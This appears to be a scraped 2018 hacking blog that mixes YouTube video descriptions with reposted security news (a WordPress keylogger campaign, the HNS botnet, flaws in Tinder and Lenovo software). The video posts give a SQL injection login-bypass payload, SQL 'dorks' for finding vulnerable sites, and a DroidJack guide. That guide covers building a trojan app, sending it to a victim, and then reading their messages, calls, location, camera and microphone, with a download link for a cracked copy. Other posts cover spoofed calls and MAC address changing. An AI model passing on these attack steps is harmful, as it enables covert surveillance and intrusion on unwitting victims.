Breaking

Wednesday, April 18, 2018

Wednesday, April 18, 2018

HOW TO CHANGE MAC ADDRESS OF COMPUTER || TOOLS TO CHANGE MAC ADDRESS !!(...





WORKING-HOW TO CHANGE MAC ADDRESS OF COMPUTER/LAPTOP
AYYO GOOD MORNING HACKVINERS FAIZAN BACK HERE WITH A NEW VIDEO SO IN THIS VIDEO I AM GOING TO TEACH YOU GUYS HOW YOU CAN CHANGE THE MAC ADDRESS OF A COMPUTER OR YOUR LAPTOP.

AND ALSO WHY IT IS NEEDED TO DO SO !!!

-+-+-ASK ANY QUESTION HERE+-+-+-
---
https://www.instagram.com/faizann_ali/

SUBSCRIBE TO MY CHANNEL
https://www.youtube.com/channel/UCeJU...

*****************DISCLAIMER:THIS VIDEO IS JUST FOR EDUCATIONAL PURPOSE ONLY.CONTENT OF THE VIDEO DOESN'T BELONGS TO ANY ILLEGAL ACTIVITY THE MAIN AIM OF THE VIDEO IS TO EDUCATE PEOPLE ABOUT INTERNET SECURITY.****************

WHAT IS A MAC ADDRESS?
A media access control address (MAC address) of a device is a unique identifier assigned to network interface controllers for communications at the data link layer of a network segment. MAC addresses are used as a network address for most IEEE 802 network technologies, including Ethernet and Wi-Fi.


HOW TO FIND MAC ADDRESS OF COMPUTER?
To locate the Wireless Adapter MAC Address, follow these steps:
1.Press the Windows Start key to open the Start screen.
2.Type cmd and press Enter to launch the command prompt.
3.Type ipconfig /all into the command prompt.
4.Look for the Wireless Adapter MAC address listed as Physical Address.

COMMENT
LIKE
SHARE
AND
SUBSCRIBE
other tags:-
how to change mac address of computer,how to change mac address in laptop,how to find mac address on laptop,change mac address,how to use tmac v6,what is a mac address,how to change my ip address,hackvines,how to,mac address,find mac address,windows 7,sql injection,find mac address using cmd,how to change mac address using cmd,tools to change mac address,best tool to change mac address,laptop mac address,faizan

Tuesday, April 10, 2018

Tuesday, April 10, 2018

MULTIPLE YOUTUBE VEVO ACCOUNT GOT HACKED! (TODAY)

(PROOF)MULTIPLE CELEBRITES YOUTUBE ACCOUNT GOT HACKED-VEVO!! (TODAY) HACKED BY Kuroi'SH -+-+-ASK ANY QUESTION HERE+-+-+- ---https://www.instagram.com/faizann_ali/ hey guys this video is in hurry i didnt edit.. the only thing i want is LIKE SHARE AND SUBSCRIBE.. VEVO, it’s one of the most popular Copyright holders I have seen in recent years. I’m pretty sure the name alone brings back memories to people who watched their Youtube Videos, or the ones hosted on their website. *Breaking News* YouTube's music video for the hit song Despacito, which has had over five billion views, has been hacked. More than a dozen other artists, including Shakira, Selena Gomez, Drake and Taylor Swift are also affected. The original clips had been posted by Vevo. The Despacito video has been removed, but its cover image had shown a group wearing masks and pointing guns. The hackers, calling themselves Prosox and Kuroi'sh, had written "Free Palestine" underneath the videos. Several of the clips remain live at time of writing. Of those, the actual video content itself appears to be unaltered. Many titles have been changed to include the names of the hackers, but only some feature the replaced cover image. Both YouTube and the music video hosting service Vevo have been contacted for comment. A Twitter account that apparently belongs to one of the hackers posted: "It's just for fun, I just use [the] script 'youtube-change-title-video' and I write 'hacked'." We all know that VEVO is the place where most popular music artists release their videos. The company has become prevalent like MTV did before it. However, the joint company founded by Warner Music Group, Sony Music Entertainment, Universal Music Group, Alphabet Inc. and Abu Dhabi Media has suffered a cyber-attack in recent days. The company currently worth $200 Million dollars seems to have missed their cybersecurity lessons. Because they have gotten breached by a hacker group, as mentioned by a VEVO spokesperson to Gizmodo on Friday. “(We) can confirm that VEVO experienced a data breach as a result of a phishing scam via LinkedIn. We have addressed the issue and are investigating the extent of exposure.” The incident happened due to a hacker squad by the name of “OurMine”. This isn’t the first time they do an operation of this caliber, either. COMMENT LIKE SHARE AND SUBSCRIBE

Tuesday, March 13, 2018

Tuesday, March 13, 2018

HOW TO HACK A WEBSITE | SQL injection 2018 (FULL PRACTICAL)





[2018]HOW TO HACK DATABASE OF A WEBSITE | SQL INJECTION 2018 [FULL PRACTICAL]

-+-+-ASK ANY QUESTION HERE+-+-+-
---
https://www.instagram.com/faizann_ali/


*****************DISCLAIMER:THIS VIDEO IS JUST FOR EDUAATIONAL PURPOSE ONLY.CONTENT OF THE VIDEO DOESN'T BELONGS TO ANY ETHICAL ACTIVITY THE MAIN AIM OF THE VIDEO IS TO EDUCATE PEOPLE ABOUT INTERNET SECURITY.****************

AYOOO WHAT UP HACKVINERS FAIZAN BACK HERE WITH A NEW VIDEO IN THIS VIDEO I AM GOING TO TEACH YOU GUYS HOW TO HACK DATABASE OF WEBSITE USING SQL INJECTION 2018 [FULL PRACTICAL]

What is SQL Injection?
SQL Injection is a web based attack used by hackers to steal sensitive information from organizations through web applications. It is one of the most common application layer attacks used today. This attack takes advantage of improper coding of web applications, which allows hackers to exploit the vulnerability by injecting SQL commands into the prior web application.

The underlying fact that allows for SQL Injection is that the fields available for user input in the web application allow SQL statements to pass through and interact with or query the database directly.

For example, let us consider a web application that implements a form-based login mechanism to store the user credentials and performs a simple SQL query to validate each login attempt.

Here is a typical example:

select * from users where username='admin' and password='admin123′;

If the attacker knows the username of the application administrator is admin, he can login as admin without supplying any password.

admin'–

The query in the back-end looks like:

Select * from users where username='admin'–' and password='xxx';

Note the comment sequence (–) causes the followed query to be ignored, so query executed is equivalent to:

Select * from users where username='admin';

So password check is bypassed.

WATCH FULL VIDEO FOR PRACRICAL

COMMENT
LIKE
SHARE
AND
SUBSCRIBE



Saturday, March 10, 2018

Saturday, March 10, 2018

[NEW]WHAT IS GOOGLE DORKS || FULL PRACTICAL || SQL's DORKS (HOW TO USE I...





[2018]WHAT IS GOOGLE DORKS || FULL PRACTICAL || SQL's DORKS 🖥💉💉(HOW TO USE IT) HACKING

-+-+-ASK ANY QUESTION HERE+-+-+-
LINK:-
https://www.instagram.com/faizann_ali/

============================================

==============SUBSCRIBE NOW================
LINK:-
https://www.youtube.com/HACKVINES
============================================


*/*/DISCLAIMER:THIS VIDEO IS JUST FOR EDUCATIONAL PURPOSE ONLY.CONTENT OF THE VIDEO DOESN'T BELONGS TO ANY ETHICAL ACTIVITY THE MAIN AIM OF THE VIDEO IS TO EDUCATE PEOPLE ABOUT INTERNET SECURITY.*/*/

=============================================

AYOOO WHAT UP HACKVINERS FAIZAN BACK HERE WITH A NEW VIDEO IN THIS VIDEO I AM GOING TO TEACH YOU GUYS WHAT IS GOOGLE DORKS || FULL PRACTICAL || SQL's DORKS (HOW TO USE IT)

AT FIRST I TAUGHT YOU ABOUT WHAT IS GOOGLE DETAILS THEN I GAVE YOU FULL PRACTICAL ON HOW TO USE IT.

A Google dork query, sometimes just referred to as a dork, is a search string that uses advanced search operators to find information that is not readily available on a website.

Google dorking, also known as Google hacking, can return information that is difficult to locate through simple search queries. That description includes information that is not intended for public viewing but that has not been adequately protected.

As a passive attack method, Google dorking can return usernames and passwords, email lists, sensitive documents, personally identifiable financial information (PIFI) and website vulnerabilities. That information can be used for any number of illegal activities, including cyberterrorism, industrial espionage, identity theft and cyberstalking.

A search parameter is a limitation applied to a search. Here are a few examples of advanced search parameters:

site: returns files located on a particular website or domain.
filetype: followed (without a space) by a file extension returns files of the specified type, such as DOC, PDF, XLS and INI. Multiple file types can be searched for simultaneously by separating extensions with “|”.
inurl: followed by a particular string returns results with that sequence of characters in the URL.
intext: followed by the searcher’s chosen word or phrase returns files with the string anywhere in the text.
Multiple parameters can be used, for example, to search for files of a certain type on a certain website or domain. The Public Intelligence website provides this example:

“sensitive but unclassified” filetype:pdf site:publicintelligence.net

Those search parameters return PDF documents on that website’s servers with the string “sensitive but unclassified” anywhere in the document text.

SOME OF THE DORKS:-
intitle:" " // target title
inurl:" " //target url
intext:" " // target description
allintext:"Copyright © Litchi"
site:"hackvines.in" //target all website pages or countries extension
"filetype" hacking.pdf //target the filetypes


**sql dork
inurl:".php?id="
inurl:".php?id=" add to cart (got sql error)
buy.php?category=
article.php?id=
gallery.php?id=
page.php?id=


IF YOU GUYS LIEK THIS VIDEO MAKE SURE YOU HIT THE SUBSCRIBE BUTTON AND LIKE THIS VIDEO.

*******************SUBSCRIBE
************************COMMENT
******************************SHARE
************************************LIKE

OTHER TAGS:-
what is google dorks,google dorks practical,google dorks in hindi,google dorks 2018,what is sql dorks,sql dorks 2018,sql dorks practical,sql dorks in hindi,how to use google dorks for sql injection,how to use google dorks,google hacking database,hacking with browsers,hackvines,hacking with google,how to use google dorking,hacking for beginners,search engine hacking,best search engine hacking,Information,security

Wednesday, February 14, 2018

Wednesday, February 14, 2018

[NEW] HOW TO MAKE PRIVATE UNKNOWN CALLS TO OTHERS USING THIS APP







[NEW] HOW TO MAKE PRIVATE UNKNOWN NUMBER CALL USING THIS APP

THIS VIDEO IS FOR EDUCATIONAL PURPOSES ONLY..THIS DOES'NT VOILATE ANY COPYRIGHTS ANY KIND OF ILLEGAL ACTIVITIES.

INSTAGRAM:-@
https://www.instagram.com/faizann_ali/

AYYOOO WHAT UP HACKVINERS FAIZAN BACK HERE WITH A NEW VIDEO IN THIS VIDEO I CAME UP WITH THIS VIDEO I FOUND THIS INTRESTING LIKE CALLING PEOPLE WITH FAKE OR UNKNOWN NUMBER.
THIS IS INSANE !! SERIOUSLY

ACTUALLY I MADE THE VIDEO AGAIN JUST BECZ MY PREVIOUS VIDEO WAS DELETED SO I MADE A NEW ONE YOU WILL FIND DIFF. IN THE TIMES AND THE BALANCE TOO.
AND AFTER 3 MINS THERE IS NOT PROPER VIDEO SOUNDS..
SO PLEASEE IGNORE THAT THING FOCUS ON THE VIDEO AND THE THING I WANT TO TEACH YOU GUYS.

BE THE STRONGEST FAMILY GUYS....KEEP SHARING THINGS WITH ME.

[नया] निजी एन्कोडिंग का इस्तेमाल करके इस एपीपी का उपयोग कैसे करें

यह वीडियो केवल शैक्षणिक प्रयोजनों के लिए है ... ऐसा कोई भी व्यक्ति अनैतिक गतिविधियों के किसी भी प्रकार की कॉपीराइट नहीं है।

अइयूको क्या हैक्वियर फ़ाइज़ेन ने इस वीडियो में एक नए वीडियो के साथ यहां इस वीडियो के साथ मैं आया था, इस तरह मैं नकली या अज्ञात नंबर वाले लोगों को कॉल करने की इजाजत देता हूं।
यह पागल है !! गंभीरता से
 
वास्तव में मैंने वीडियो बना लिया, फिर से मेरे पिछले वीडियो को हटा दिया गया था, इसलिए मैंने एक नया बना दिया है, आप डिफफ़ेस को ढूंढेंगे। समय और संतुलन बहुत में
और 3 मिनट के बाद उचित वीडियो ध्वनि नहीं है ..
तो कृपया ध्यान दें कि वीडियो पर ध्यान केंद्रित करना और उस विषय को मैं आपको गावसों को पढ़ाना चाहता हूं।

सबसे मजबूत परिवार के दोस्तों बनो .... मेरे साथ चीजों को साझा करना।

Tuesday, February 06, 2018

Tuesday, February 06, 2018

How To Hack Android Phone 100% Real And Working !! (2018)*Updated* | Dro...







Hack Vines
#how_to_hack_android_phone_100%_real_ and_working_2017

*********link is in the last of description.*****

So guys welcome back to my channel
#hackvines.The time has come for the real hack hack i have just crossed 4000 subscribers so i am posting this value able video which will help you guys to hack any android phones.Before moving on further i want to tell you guys i am using my friend id maneer alam to log in to some website i had no time left it was do or die situation for me :P (video daali nhi na kaafi tym se isliye do or die sitution thi).
without wasting time come to the video discription.. in this video i am actually creating an fake app using droidjack and then upload it to sever host and copied the link and send to the victim (in this video victim is me )..so futher on when the user aka victim install the app in his/her android phone at that time he is hacked... WTF..yes its true now your are in the phone.dNow you have full access over victim device.You grab messages, call log, pin point location, listen real time calls, access data from file manager and much more.. now do whatever you want to do but before that subscribe my channel for new hacking vines...Stay tune hack viners...


Subscribe for more....SB free hai .....
__________________________________

FEATURES :-
+ Inbuilt APK Tool
- Bind your server APK with any other Game or App.
- Encrypt APK using AES/DES/TDES/Blowfish algorithms

+ File Voyager
- Explore files
- Download file/folder
- Delete files

+ SMS Trekker
- Delete SMS
- Read conversations
- Write SMS
- Send SMS

+ Call Manager
- Read call logs
- Delete call logs
- Make calls
- Record call conversation*

+ Remote Eyes
- Take picture from front/back camera
- Record video from front/back camera

+ Remote Ears
- Listen to mic lively
- Record mic
________________________________
APK's used:-
1.droidjack link-
http://www85.zippyshare.com/v/e8SEXsU...
Password is-rekings.com
*Plsase download java to make it run properly.

_____________________________________________

You can find me-:
Facebook-hackvines
Instagram-faizan.hackvines

Watch my other videos

Please give comments and HIT LIKE.....

TAGs:_
#How_To_Hack_Messages_Of_Anyone
How To Read Anyone's Messages
#How_To_Trace_Location
How To Trace GPS Real Time Location
android (operating system), android, cell, samsung, phone, mobile phone (video game platform), nokia, hack, kali linux, iphone, smartphone, mobile, candy crush, life hack, tips, make, stand, lamp, stylus, do it again (composition), smartphone (video game platform), mobile phone, angry birds (video game), video game (industry), telephone (invention), hacker (character power), game, app, cell phone, phones, touch, software (industry), guide, howto, to, hack android, android (software), android hack, gnu/linux (operating system), how
hacking, droidjack v4.0 cracked, jackktutorials, creativity, design, editing, tinkering, video, programming, cracking, technology, computer, droidjack v4.0 crack, droidjack v3.3 crack, gmod, droidjack v3.3 cracked, trackview, spy, androrat, hacker (character power), phone, hacks, software (industry), keylogger, hack, hiroshima, android, droidjack, اختراق الاندرويد, شرح برنامج اختراق الاندرويدmobile spy, phone spy, android spy, viber spy, whatsapp spy, how to hack android phones from pc,how to use droidjack,hack android phone remotely,hack android phone camera,how to hack android phone free,How To Hack Any Android Phone,how to hack android phones remotely,hack android phone with computer,hack android phone,hack android phone using android,how to hack android phones,working,android phone simply hack,hack android phone using wifi,in hindi,usa,dubai,easy,trusted,how to hack android phones in hindi
PLEASE SHARE THIS VIEDO.


piratenbucht.eu thepiratebay proxy piratebaai.click thepiratebay proxy piratbaypirate.link indiaproxy.in

Sunday, January 28, 2018

Sunday, January 28, 2018

Attackers behind Cloudflare_solutions Keylogger are back, 2000 WordPress sites already infected

More than 2,000 sites running the WordPress CMS have been infected with a malicious script that can deliver both a keylogger and the in-browser cryptocurrency miner CoinHive.

This new hacking campaign was spotted by experts from the security firm Sucuri, the experts believe the attackers are the same that launched a campaign that infected 5,500 WordPress sites in December.

In both campaigns, the threat actors used a keylogger dubbed cloudflare[.]solutions, but be careful, there is no link to security firm Cloudflare.



After the discovery in December of campaign, the cloudflare[.]solutions domain was taken down, but this new discovery confirms that threat actors are still active and are using a new set of recently registers domains to host the malicious scripts that are injected into WordPress sites.

By querying the search engine PublicWWW,  researchers discovered that the number of infected sites includes 129 from the domain cdns[.]ws and 103 websites for cdjs[.]online.

“A few days after our keylogger post was released on Dec 8th, 2017, the Cloudflare[.]solutions domain was taken down. This was not the end of the malware campaign, however; attackers immediately registered a number of new domains including cdjs[.]online on Dec 8th, cdns[.]ws on Dec 9th, and msdns[.]online on Dec 16th.” reads the analysis published by Sucuri.

“PublicWWW has already identified relatively few infected sites: 129 websites for cdns[.]ws and 103 websites for cdjs[.]online, but it’s likely that the majority of the websites have not been indexed yet. Since mid-December, msdns[.]online has infected over a thousand websites, though the majority are reinfections from sites that have already been compromised.”

Most of the infected domains are tied to msdns[.]online, with over a thousand reported infections. In many cases, threat actors re-infected WordPress sites compromised in the previous campaign.

WordPress sites hacking

The attackers target outdated and poorly configured WordPress sites, they inject the cdjs[.]online script either a WordPress database (wp_posts table) or into the theme’s functions.php file.

The Keylogger script is able to capture data entered on every website form, including the admin login form, information is sent back to the attackers via the WebSocket protocol.

Just like previous versions of the campaign leveraging a Fake GoogleAnalytics Script, researchers identified a fake googleanalytics.js that loads an obfuscated script used to load the malicious scripts “startGoogleAnalytics” from the attackers’ domains.

Experts discovered many similarities also in the cryptominer component of this campaign.

“We’ve identified that the library jquery-3.2.1.min.js is similar to the encrypted CoinHive cryptomining library from the previous version, loaded from hxxp:// 3117488091/lib/jquery-3.2.1.min.js?v=3.2.11 (or hxxp://185 .209 .23 .219/lib/jquery-3.2.1.min.js?v=3.2.11, a more familiar representation of the IP address). This is not surprising since cdjs[.]online also exists on the server 185 .209 .23 .219.” continues the analysis.

“It’s interesting to note that this script extends the CoinHive library and adds an alternative configuration using the 185 .209 .23 .219 server (and now specifically cdjs[.]online) for LIB_URL and WEBSOCKET_SHARDS.”

According to Sucuri experts, the threat actors behind this hacking campaign are active at least since April 2017. Sucuri has tracked at least other three different malicious scripts hosted on the same cloudflare.solutions domain across the months.

The first attack leveraging on these scripts was observed in April when hackers used a malicious JavaScript file to embed banner ads on hacked sites.

In November, experts from Sucuri reported the same attackers were loading malicious scripts disguised as fake jQuery and Google Analytics JavaScript files that were actually a copy of the Coinhive in-browser cryptocurrency miner. By November 22, the experts observed 1,833 sites compromised by the attackers.

Experts noticed that this campaign is still not massive as the one spotted in December, anyway it could not be underestimated.

“While these new attacks do not yet appear to be as massive as the original cloudflare[.]solutions campaign, the reinfection rate shows that there are still many sites that have failed to properly protect themselves after the original infection,” concluded Sucuri.




piratenbucht.eu thepiratebay proxy piratebaai.click thepiratebay proxy piratbaypirate.link indiaproxy.in
Sunday, January 28, 2018

Hurry up, update your Lenovo Fingerprint Manager Pro if you use Windows 7, 8 and 8.1

The PC vendor Lenovo has fixed a hardcoded password vulnerability, tracked as (CVE-2017-3762), affecting a dozen Lenovo laptop models that run versions of Microsoft Windows 7, 8 and the 8.1 operating system.
Lenovo laptops running Windows 10 are not impacted by the vulnerability because that OS version natively supports fingerprint reader technology.
The list of impacted family models includes ThinkPad, ThinkCentre, and ThinkStation laptops.
“A vulnerability has been identified in Lenovo Fingerprint Manager Pro. Sensitive data stored by Lenovo Fingerprint Manager Pro, including users’ Windows logon credentials and fingerprint data, is encrypted using a weak algorithm, contains a hard-coded password, and is accessible to all users with local non-administrative access to the system it is installed in.” states the security advisory published by Lenovo.

The Lenovo Fingerprint Manager Pro is a utility that allows users to log into their laptop and configured websites by using the fingerprint.
The flaw resides in the Lenovo Fingerprint Manager Pro that encrypts sensitive data such as fingerprint data and login credentials using a weak algorithm.
Customers urge to update Fingerprint Manager Pro to version 8.01.87 or later.
The complete list of laptops that need to update their Lenovo Fingerprint Manager Pro version is:
  • ThinkPad L560
  • ThinkPad P40 Yoga, P50s
  • ThinkPad T440, T440p, T440s, T450, T450s, T460, T540p, T550, T560
  • ThinkPad W540, W541, W550s
  • ThinkPad X1 Carbon (Type 20A7, 20A8), X1 Carbon (Type 20BS, 20BT)
  • ThinkPad X240, X240s, X250, X260
  • ThinkPad Yoga 14 (20FY), Yoga 460
  • ThinkCentre M73, M73z, M78, M79, M83, M93, M93p, M93z
  • ThinkStation E32, P300, P500, P700, P900
The flaw was disclosed by Lenovo this week, the company credited Jackson Thuraisamy, a senior security consultant with Security Compass, for the discovery.

piratenbucht.eu thepiratebay proxy piratebaai.click thepiratebay proxy piratbaypirate.link indiaproxy.in
Sunday, January 28, 2018

Cryptocurrencies Black Friday – Japan-based digital exchange Coincheck hacked

It is a black Friday for cryptocurrencies, the news of the hack of the Japan-based digital exchange Coincheck had a significant impact on their value.
Coincheck was founded in 2012, it is one of the most important cryptocurrency exchange in Asia.
The Coincheck suspended the operations of deposits and withdrawals for all the virtual currencies except bitcoin, the exchange announced it was investigating an “unauthorised access” to the exchange.
According to the company, the hackers stole worth half a billion US dollars of NEM, the 10th biggest cryptocurrency by market capitalization.
The news of the incident has a significant impact on the NEM value that dropped more than 16 percent in 24 hours.
“At 3 am (1800 GMT) today, 523 million NEMs were sent from the NEM address of Coincheck. It’s worth 58 billion yen based on the calculation at the rate when detected,” said Coincheck COO Yusuke Otsuka.
“We’re still examining how many of our customers are affected,”

NEM Charts – CoinMarketCap.com
The experts at the exchange are investigating the security breach to find out whether it was from Japan or another country.
Coincheck discovered the incident at 11.25 am and notified the suspension of trading for all cryptocurrencies apart from bitcoin via Twitter.
In February 2014, Mt. Gox suspended trading and filed for bankruptcy protection from creditors.

At the time, the company was handling over 70% of all bitcoin transactions worldwide, it announced that approximately 850,000 bitcoins ($450 million at the time) belonging to customers and the company were stolen.

piratenbucht.eu thepiratebay proxy piratebaai.click thepiratebay proxy piratbaypirate.link indiaproxy.in

Thursday, January 25, 2018

Thursday, January 25, 2018

New HNS botnet has already compromised more than 20,000 IoT devices

The HNS botnet was first spotted on January 10th by malware researchers from Bitdefender, then it disappeared for a few days, and it has risen over the weekend.

The number of infected systems grew up from 12 at the time of the discovery up to over 20,000 bots, at the time of writing.

HNS botnet

“Bitdefender researchers have uncovered an emerging botnet that uses advanced communication techniques to exploit victims and build its infrastructure. The bot, dubbed HNS, was intercepted by our IoT honeypot system following a credentials dictionary attack on the Telnet service.” states the analysis from Bitdefender.



“The samples identified in our honeypots on Jan. 10 revolved around IP cameras manufactured by a Korean company. These devices seemed to play a major role in the botnet as, out of the 12 IP addresses hardcoded in the sample, 10 used to belong to Focus H&S devices. The new version, observed on Jan. 20, dropped the hardcoded IPs.”

Recently security experts spotted other IoT botnets, most of them linked to the Mirai botnet, such as Satori, Okiru, and Masuta, but the HNS botnet has a different genesis and doesn’t share the source code.

Researchers at Bitdefender found similarities between the HNS and the Hajime botnets, unlike Mirai, Hajime doesn’t use C&C servers, instead, it implements a peer-to-peer network.

Hajime is more sophisticated than Mirai, it implements more mechanisms to hide its activity and running processes and its modular structure allows operators to add new capabilities on the fly.

“It is the second known IoT botnet to date, after the notorious Hajime botnet, that has a decentralized, peer-to-peer architecture,” states Bitdefender. “However, if in the case of Hajime, the P2P functionality was based on the BitTorrent protocol, here we have a custom-built P2P communication mechanism.”

The HNS malware is able to infect a series of IoT devices using the exploit as Reaper, the current version is able to receive and execute several types of commands, such as data exfiltration, code execution and interference with a device’s operation.HNS botnet

According to the experts, the botnet is still under development, it doesn’t include DDoS capabilities, a circumstance that suggests it is intended to be deployed as a proxy network.

“While IoT botnets have been around for years, mainly used for DDoS attacks, the discoveries made during the investigation of the Hide and Seek bot reveal greater levels of complexity and novel capabilities such as information theft – potentially suitable for espionage or extortion.” concluded Bitdefender.

“It is also worth noting that the botnet is undergoing constant redesign and rapid expansion.”

The bot spread by randomly generates a list of IP addresses that could be potentially compromised. It then initiates a raw socket SYN connection to each potential target and continues communication with those devices that answer the request on specific destination ports (23 2323, 80, 8080).

Once the bot has established a connection it will look for a specific banner (“buildroot login:”) presented by the victim. If it gets this login banner, it attempts to log in using a list of default credentials. If the credentials are not correct, the botnet launches a dictionary attack using a hardcoded list.

Once connected to the victim, the malware will run through a “state machine” to determine the type of target device and select the most suitable compromise method. Experts explained that if the device shares the same network with the bot, the bot sets up TFTP server to allow the victim to download the malicious code from the bot. If the victim is located on the internet, the bot will attempt to use a specific remote payload delivery method to get the target device to download and execute the sample.

“These exploitation techniques are preconfigured and are located in a memory location that is digitally signed to prevent tampering. This list can be updated remotely and propagated among infected hosts.” continues the analysis.

Experts observed that the HNS botnet cannot establish persistence on infected devices, once the device restart, the malware will be removed, this means that botnet operators have to continuously manage the HNS botnet.

Let’s monitor the growth of the new-born botnet.



piratenbucht.eu thepiratebay proxy piratebaai.click thepiratebay proxy piratbaypirate.link indiaproxy.in
Thursday, January 25, 2018

Are you a Tinder user? Watch out, someone could spy on you

Security experts at Checkmarx discovered two security vulnerabilities in the Tinder Android and iOS dating applications that could be exploited by an attacker on the same wi-fi network as a target to spy on users and modify their content.
Attackers can view a target user’s Tinder profile, see the profile images they view and determine the actions they take.
“The vulnerabilities, found in both the app’s Android and iOS versions, allow an attacker using the same network as the user to monitor the user’s every move on the app. It is also possible for an attacker to take control over the profile pictures the user sees, swapping them for inappropriate content, rogue advertising or other type of malicious content (as demonstrated in the research).” reads the analysis published by Checkmarx.
“While no credential theft and no immediate financial impact are involved in this process, an attacker targeting a vulnerable user can blackmail the victim, threatening to expose highly private information from the user’s Tinder profile and actions in the app.”
An attacker can conduct many other malicious activities, including intercepting traffic and launching DNS poisoning attacks.
The first issue is related to the fact that both the iOS and Android Tinder apps download profile pictures via insecure HTTP connections, this means that an attacker can access the traffic to determine which profiles are viewed by a Tinder user.

SOCIAL NETWORKS / TINDER
An attacker could also modify traffic for example to swap images.
“Attackers can easily discover what device is viewing which profiles,” continues the analysis. “Furthermore, if the user stays online long enough, or if the app initializes while on the vulnerable network, the attacker can identify and explore the user’s profile.” “Profile images that the victim sees can be swapped, rogue advertising can be placed and malicious content can be injected,”
Obviously, such kind of issue could be mitigated with the adoption of HTTPS.
Checkmarx also discovered another issue related to the use of HTTPS, the flaw was called “Predictable HTTPS Response Size”.
“By carefully analyzing the traffic coming from the client to the API server and correlating with the HTTP image requests traffic, it is possible for an attacker to determine not only which image the user is seeing on Tinder, but also which action did the user take.” states Checkmarx. “This is done by checking the API server’s encrypted response payload size to determine the action,” 
An attacker that is in the position of analyzing the traffic can discover the user’s interest in a specific profile by detecting a 278-byte encrypted response that is delivered by the API server when he swipes left on a profile picture. Swiping right, the Tinder user likes a particular profile, in this case, the response generated is composed of 374 bytes.
The researchers also noticed that Tinder member pictures are downloaded to the app via HTTP connection, this makes possible for an attacker to view the profile images of those users being swiped left and right.
In order to mitigate this issue, researchers suggest padding requests, if the responses were padded to a fixed size, it would be impossible to discriminate the user’s action.
Checkmarx disclosed both vulnerabilities to Tinder.



piratenbucht.eu thepiratebay proxy piratebaai.click thepiratebay proxy piratbaypirate.link indiaproxy.in